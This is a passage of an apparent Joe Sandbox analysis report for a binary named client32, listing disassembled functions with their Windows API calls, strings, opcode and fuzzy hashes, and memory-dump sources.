                                                                                                                                                    • Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                                                                                    • Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
                                                                                                                                                    • Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
                                                                                                                                                    • Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8
                                                                                                                                                    Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 110351E0
                                                                                                                                                      • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                                      • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                                      • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                                                    • _memmove.LIBCMT ref: 11035267
                                                                                                                                                    • _memmove.LIBCMT ref: 1103528B
                                                                                                                                                    • _memmove.LIBCMT ref: 110352C5
                                                                                                                                                    • _memmove.LIBCMT ref: 110352E1
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 1103532B
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 11035340
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                    • String ID: deque<T> too long
                                                                                                                                                    • API String ID: 827257264-309773918
                                                                                                                                                    • Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                                                                                                    • Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
                                                                                                                                                    • Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
                                                                                                                                                    • Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790
                                                                                                                                                    Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 11019370
                                                                                                                                                      • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
                                                                                                                                                      • Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
                                                                                                                                                      • Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4
                                                                                                                                                    • _memmove.LIBCMT ref: 110193F7
                                                                                                                                                    • _memmove.LIBCMT ref: 1101941B
                                                                                                                                                    • _memmove.LIBCMT ref: 11019455
                                                                                                                                                    • _memmove.LIBCMT ref: 11019471
                                                                                                                                                    • std::exception::exception.LIBCMT ref: 110194BB
                                                                                                                                                    • __CxxThrowException@8.LIBCMT ref: 110194D0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
                                                                                                                                                    • String ID: deque<T> too long
                                                                                                                                                    • API String ID: 827257264-309773918
                                                                                                                                                    • Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                                                                                                    • Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
                                                                                                                                                    • Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
                                                                                                                                                    • Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790
                                                                                                                                                    Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 111194E1
                                                                                                                                                    • MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 11119508
                                                                                                                                                    • GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
                                                                                                                                                    • GetSystemMetrics.USER32(00000003), ref: 11119559
                                                                                                                                                    • GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 11119576
                                                                                                                                                    Strings
                                                                                                                                                    • GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
                                                                                                                                                    • String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
                                                                                                                                                    • API String ID: 4172599486-2052393828
                                                                                                                                                    • Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                                                                                    • Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
                                                                                                                                                    • Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
                                                                                                                                                    • Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60
                                                                                                                                                    Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
                                                                                                                                                      • Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
                                                                                                                                                      • Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33
                                                                                                                                                    • wsprintfA.USER32 ref: 1100977F
                                                                                                                                                    • wsprintfA.USER32 ref: 11009799
                                                                                                                                                    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
                                                                                                                                                    • String ID: %s%s.htm$.%u$ApprovedWebList$Store\
                                                                                                                                                    • API String ID: 559337438-1872371932
                                                                                                                                                    • Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                                                                                    • Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
                                                                                                                                                    • Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
                                                                                                                                                    • Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90
                                                                                                                                                    Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,?), ref: 11025351
                                                                                                                                                      • Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
                                                                                                                                                      • Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
                                                                                                                                                      • Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
                                                                                                                                                      • Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
                                                                                                                                                      • Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
                                                                                                                                                      • Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
                                                                                                                                                      • Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
                                                                                                                                                      • Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
                                                                                                                                                      • Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
                                                                                                                                                      • Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
                                                                                                                                                      • Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF
                                                                                                                                                    • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
                                                                                                                                                    • SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
                                                                                                                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
                                                                                                                                                    • SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
                                                                                                                                                    • SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
                                                                                                                                                    • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
                                                                                                                                                    • String ID: 8
                                                                                                                                                    • API String ID: 762489935-4194326291
                                                                                                                                                    • Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                                                                    • Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
                                                                                                                                                    • Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
                                                                                                                                                    • Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69
                                                                                                                                                    Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 1100521E
                                                                                                                                                    • _memset.LIBCMT ref: 11005240
                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 11005254
                                                                                                                                                    • CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
                                                                                                                                                    • EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
                                                                                                                                                    • GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
                                                                                                                                                    • SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ItemMenu$Info$CheckCountEnable_memset
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 2755257978-4108050209
                                                                                                                                                    • Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                                                                    • Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
                                                                                                                                                    • Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
                                                                                                                                                    • Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60
                                                                                                                                                    Function 11131730 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 102registrystringmemoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\ProductOptions,00000000,00020019,?,75730BD0,00000000,?,?,?,1113832B,Terminal Server), ref: 1113176C
                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,1113832B,Terminal Server), ref: 1113181D
                                                                                                                                                      • Part of subcall function 11143BD0: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1111025B,76968400,?,?,11145D2F,00000000,CSDVersion,00000000,00000000,?), ref: 11143BF0
                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,1113832B,00000000,?,?,?,?,?,?,?,?,?,?,?,1113832B,Terminal Server), ref: 111317A4
                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,?), ref: 111317E6
                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 111317ED
                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 11131808
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Local$AllocCloseFreeOpenQueryValuelstrcmplstrlen
                                                                                                                                                    • String ID: ProductSuite$System\CurrentControlSet\Control\ProductOptions
                                                                                                                                                    • API String ID: 2999768849-588814233
                                                                                                                                                    • Opcode ID: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                                                                                    • Instruction ID: 2515fb7f011805fb85e8c25417bcbf5fc72413bf415e28cc1fef82dce871dec7
                                                                                                                                                    • Opcode Fuzzy Hash: ecb84a4cf3fbf479d0a09f1b815cb519d276a5df4c85cacf1ff69a98aeca7d6a
                                                                                                                                                    • Instruction Fuzzy Hash: 323163B6D1425DBFEB11CFA5CD84EAEF7BCAB84619F1441A8E814A3604D730AA0487A5
                                                                                                                                                    Function 1101D720 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 1101D750
                                                                                                                                                    • GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D76A
                                                                                                                                                    • _memset.LIBCMT ref: 1101D77A
                                                                                                                                                    • RegisterClassExA.USER32(?), ref: 1101D7BB
                                                                                                                                                    • CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11195264,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D7EE
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 1101D7FB
                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 1101D802
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
